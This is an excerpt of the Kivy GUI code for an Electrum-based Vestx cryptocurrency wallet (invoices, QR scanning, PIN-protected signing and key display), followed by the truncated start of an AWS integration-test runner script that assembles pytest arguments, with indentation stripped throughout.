self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_vestx.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('vestx:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_vestx.transaction import Transaction
from electrum_vestx.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_vestx.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_vestx.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.vestx.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_vestx/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for vestx: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# if self.network.tor_auto_on and not self.network.tor_on:
# self.show_tor_warning()
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def show_tor_warning(self):
from kivy.uix.button import Button
from kivy.uix.image import Image
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.gridlayout import GridLayout
docs_uri = self.network.tor_docs_uri
def on_docs_press(a):
import webbrowser
webbrowser.open(docs_uri)
warn_box = GridLayout(rows=4, padding=20, spacing=20)
popup = Popup(title='Warning', title_align='center',
content=warn_box, auto_dismiss=False)
img_error = 'atlas://electrum_vestx/gui/kivy/theming/light/error'
warn_box.add_widget(Image(source=img_error, size_hint_y=0.1))
warn_box.add_widget(Label(text=self.network.tor_warn_msg,
text_size=(Window.size[0]-40-32, None)))
docs_btn = Button(text=self.network.tor_docs_title, size_hint_y=0.1)
warn_box.add_widget(docs_btn)
dismiss_btn = Button(text=_('Close'), size_hint_y=0.1)
warn_box.add_widget(dismiss_btn)
dismiss_btn.bind(on_press=popup.dismiss)
docs_btn.bind(on_press=on_docs_press)
popup.open()
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage):
if storage:
wallet = Wallet(storage)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
if getattr(wallet.storage, 'backup_message', None):
self.show_info(wallet.storage.backup_message)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
storage = WalletStorage(path, manual_upgrades=True)
if not storage.file_exists():
wizard.run('new')
elif storage.is_encrypted():
raise Exception("Kivy GUI does not support encrypted wallet files.")
elif storage.requires_upgrade():
wizard.upgrade_storage(storage)
else:
raise Exception("unexpected storage file situation")
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum_vestx/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_vestx.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_vestx.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_vestx_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_vestx_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum_vestx/gui/icons/electrum-vestx.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
print('Hello tabs update')
#self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=10sp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=10sp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_vestx.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
print('Hello tabs update') #self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Vestx Electrum', message,
app_icon=icon, app_name='Vestx Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_vestx/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_vestx/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_vestx/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
test_runner.py
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import datetime
import logging
import multiprocessing
import os
import sys
import time
import argparse
import pytest
from reports_generator import generate_json_report, generate_junitxml_merged_report
logger = logging.getLogger()
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(module)s - %(message)s", level=logging.INFO)
START_TIME = time.time()
START_TIME_ISO = datetime.datetime.fromtimestamp(START_TIME).isoformat()
LOGS_DIR = "{0}.logs".format(START_TIME)
OUT_DIR = "{0}.out".format(START_TIME)
TEST_DEFAULTS = {
"parallelism": None,
"retry_on_failures": False,
"features": "", # empty string means all
"regions": [
"us-east-1",
"us-east-2",
"us-west-1",
"us-west-2",
"ca-central-1",
"eu-west-1",
"eu-west-2",
"eu-central-1",
"ap-southeast-1",
"ap-southeast-2",
"ap-northeast-1",
"ap-south-1",
"sa-east-1",
"eu-west-3",
],
"oss": ["alinux", "centos6", "centos7", "ubuntu1404", "ubuntu1604"],
"schedulers": ["sge", "slurm", "torque", "awsbatch"],
"instances": ["c4.xlarge", "c5.xlarge"],
"dry_run": False,
"reports": [],
"sequential": False,
"output_dir": "tests_outputs",
"custom_node_url": None,
"custom_cookbook_url": None,
"custom_template_url": None,
"custom_awsbatch_template_url": None,
"custom_awsbatchcli_url": None,
"custom_ami": None,
"vpc_stack": None,
"cluster": None,
"no_delete": False,
}
def _init_argparser():
parser = argparse.ArgumentParser(
description="Run integration tests suite.", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
"-f",
"--features",
help="Run only tests for the listed features. Prepending the not keyword to the feature name causes the "
"feature to be excluded.",
default=TEST_DEFAULTS.get("features"),
nargs="+",
)
parser.add_argument(
"-r", "--regions", help="AWS region where tests are executed.", default=TEST_DEFAULTS.get("regions"), nargs="+"
)
parser.add_argument(
"-i", "--instances", help="AWS instances under test.", default=TEST_DEFAULTS.get("instances"), nargs="+"
)
parser.add_argument("-o", "--oss", help="OSs under test.", default=TEST_DEFAULTS.get("oss"), nargs="+")
parser.add_argument(
"-s", "--schedulers", help="Schedulers under test.", default=TEST_DEFAULTS.get("schedulers"), nargs="+"
)
parser.add_argument(
"-n", "--parallelism", help="Tests parallelism for every region.", default=TEST_DEFAULTS.get("parallelism")
)
parser.add_argument(
"--retry-on-failures",
help="Retry once more the failed tests after a delay of 60 seconds.",
action="store_true",
default=TEST_DEFAULTS.get("retry_on_failures"),
)
parser.add_argument(
"--dry-run",
help="Only show the list of tests that would run with specified options.",
action="store_true",
default=TEST_DEFAULTS.get("dry_run"),
)
parser.add_argument(
"--show-output",
help="Do not redirect tests stdout to file. Not recommended when running in multiple regions.",
action="store_true",
default=TEST_DEFAULTS.get("show_output"),
)
parser.add_argument(
"--sequential",
help="Run tests in a single process. When not specified tests will run concurrently in all regions.",
action="store_true",
default=TEST_DEFAULTS.get("sequential"),
)
parser.add_argument(
"--reports",
help="create tests report files. junitxml creates a junit-xml style report file. html creates an html "
"style report file. json creates a summary with details for each dimensions",
nargs="+",
choices=["html", "junitxml", "json"],
default=TEST_DEFAULTS.get("reports"),
)
parser.add_argument("--key-name", help="Key to use for EC2 instances", required=True)
parser.add_argument("--key-path", help="Path to the key to use for SSH connections", required=True, type=_is_file)
parser.add_argument(
"--output-dir", help="Directory where tests outputs are generated", default=TEST_DEFAULTS.get("output_dir")
)
parser.add_argument(
"--custom-node-url", help="URL to a custom node package.", default=TEST_DEFAULTS.get("custom_node_url")
)
parser.add_argument(
"--custom-cookbook-url",
help="URL to a custom cookbook package.",
default=TEST_DEFAULTS.get("custom_cookbook_url"),
)
parser.add_argument(
"--custom-template-url", help="URL to a custom cfn template.", default=TEST_DEFAULTS.get("custom_template_url")
)
parser.add_argument(
"--custom-awsbatch-template-url",
help="URL to a custom awsbatch cfn template.",
default=TEST_DEFAULTS.get("custom_awsbatch_template_url"),
)
parser.add_argument(
"--custom-awsbatchcli-url",
help="URL to a custom awsbatch cli package.",
default=TEST_DEFAULTS.get("custom_awsbatchcli_url"),
)
parser.add_argument(
"--custom-ami", help="custom AMI to use for all tests.", default=TEST_DEFAULTS.get("custom_ami")
)
parser.add_argument("--vpc-stack", help="Name of an existing vpc stack.", default=TEST_DEFAULTS.get("vpc_stack"))
parser.add_argument(
"--cluster", help="Use an existing cluster instead of creating one.", default=TEST_DEFAULTS.get("cluster")
)
parser.add_argument(
"--no-delete",
action="store_true",
help="Don't delete stacks after tests are complete.",
default=TEST_DEFAULTS.get("no_delete"),
)
return parser
def _is_file(value):
if not os.path.isfile(value):
raise argparse.ArgumentTypeError("'{0}' is not a valid key".format(value))
return value
def _get_pytest_args(args, regions, log_file, out_dir):
pytest_args = ["-s", "-vv", "-l", "--rootdir=./tests"]
# Show all tests durations
pytest_args.append("--durations=0")
# Run only tests with the given markers
pytest_args.append("-m")
pytest_args.append(" or ".join(args.features))
pytest_args.append("--regions")
pytest_args.extend(regions)
pytest_args.append("--instances")
pytest_args.extend(args.instances)
pytest_args.append("--oss")
pytest_args.extend(args.oss)
pytest_args.append("--schedulers")
pytest_args.extend(args.schedulers)
pytest_args.extend(["--tests-log-file", "{0}/{1}".format(args.output_dir, log_file)])
pytest_args.extend(["--output-dir", "{0}/{1}".format(args.output_dir, out_dir)])
pytest_args.extend(["--key-name", args.key_name])
pytest_args.extend(["--key-path", args.key_path])
if args.retry_on_failures:
# Rerun tests on failures for one more time after 60 seconds delay
pytest_args.extend(["--reruns", "1", "--reruns-delay", "60"])
if args.parallelism:
pytest_args.extend(["-n", args.parallelism])
if args.dry_run:
pytest_args.append("--collect-only")
if "junitxml" in args.reports or "json" in args.reports:
pytest_args.append("--junit-xml={0}/{1}/results.xml".format(args.output_dir, out_dir))
if "html" in args.reports:
pytest_args.append("--html={0}/{1}/results.html".format(args.output_dir, out_dir))
_set_custom_packages_args(args, pytest_args)
_set_custom_stack_args(args, pytest_args)
return pytest_args
def _set_custom_packages_args(args, pytest_args):
if args.custom_node_url:
pytest_args.extend(["--custom-node-package", args.custom_node_url])
if args.custom_cookbook_url:
pytest_args.extend(["--custom-chef-cookbook", args.custom_cookbook_url])
if args.custom_template_url:
pytest_args.extend(["--template-url", args.custom_template_url])
if args.custom_awsbatch_template_url:
